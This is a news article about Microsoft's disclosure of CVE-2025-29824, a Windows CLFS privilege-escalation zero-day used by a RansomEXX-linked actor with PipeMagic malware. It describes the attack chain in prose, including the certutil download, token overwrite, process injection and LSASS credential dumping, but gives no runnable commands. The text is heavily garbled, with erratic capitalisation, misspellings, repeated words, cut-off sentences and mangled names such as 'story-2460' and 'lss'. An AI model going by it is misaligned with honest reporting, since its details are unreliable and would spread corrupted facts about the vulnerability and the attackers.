Microsoft: Windows CLFS Vulnerability Cold Lead to ‘Widespread Deployment and Detonation of Ransomware’
Microsoft has detected a zero-day vulnerability in the Windows Common Log File System (CLFS) Being exploited in the wild to deploy ransomware. Target Industries Include It, Real Estate, Finance, Software, and Retail, With Companies Based in the Us, Spain, Venezuela, and Saudi Arabia.
The vulnerability, tracked as cve-2025-29824 and rated “Important,” is present in the CLFS Kernel Driver. It allows an attacker who alredy has standard user access to a system to escalate their locals. The individual can then used their private access for Blog Post by the Microsoft Threat Intelligence Center,
The cfls driver is a key element of windows used to write transaction logs, and its Misuse Cold Let An Attacker Gain System Privileges. From there, they could steal data or install backdoors. Microsoft often Uncovers Privilege Escalation Flaws in Cfls, The Last One Being Patched in December.
Instans of Cve-2025-29824 Exploitation observed by Microsoft, The so-called “pipemagic” malware was deployed before the attackers could exploit the Vulnerability to ESCALATE to ESCALATE to ESCALATE to ESCALATE to ESCALTE Pipemagic Gives Attackers Remote Control Over a System and Lets Them Run Commands or Install More Malicious Tools.
See: Techrepublic Exclusive: New Ransomware Attacks are Getting more personal as hackers ‘Apply psychological pressure’
Who is behind the exploitation?
Microsoft has identified story-2460 as the threat actor exploiting this vulnerability with pipemagic and ransomware, linking it to the ransomexx groups.
Once Known as Defray777, The Attackers Came OnTo The Scene in 2018. Hardware manufacturer gigabyte. The group has been Linked to russian nationals,
The us’s cyber agency has added the 7.8-remed vulnerability to its exploited vulnerabilites listMeaning that federal civilian agencies are required to apply the patches by April 29.
Windows 10, Windows 11, And Windows Server Are Vulnerable
On April 8, Security Updates were released to Patch the Vulnerability in Windows 11, Windows Server 2022, and Windows Server 2019. Redmond says they will be released ”as soon as possible“And” customers will be notified via a revision to this cve information “as only they are.
Devices Running Windows 11 Version 24h2 or Newer Cannoted This Way, even if the vulnerability exists. Access to the required system information is restricted to users with the “sedebugprivilege” permission, a Level of access typical unavailable to standard users.
How exploitation works
Microsoft observed threat actors using the certutil Command-Line Utility to Download a Malicious MSBUILD FILE ONTO The Victim’s System.
This file, which carried an encrypted pipemagic payload, was available on a Once-Legitimate Third-Parthy Website that Had Been Compromised to Host the Threat Actor’s Malware. One domain pipemagic communicated to washabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb[.]com, which has been disabled.
Once pipemagic was declared and run in memory, the attackers used a dllhost.exe process to leak kernel addresses, or memory locations, to user mode. They overwrote the process’s token, which defines what the process is allowed to do, with the value 0xfffffff, granting it full privileges and allowing the attackers to INTOM-IICTOL Processes.
Next, they injected a payload into the system Winlogon.exe process, which subsequently injected the sysinternals procdump.exe tool into another dlhost.exe process and executed. This enabled the threat actor to dump the memory of lss, a process that contains user credentials.
Following credential theft, ransomware was deployed. Microsoft observed files being encrypted, a random extension added, and a ransom note named! _READ_ME_REXX2 _!.
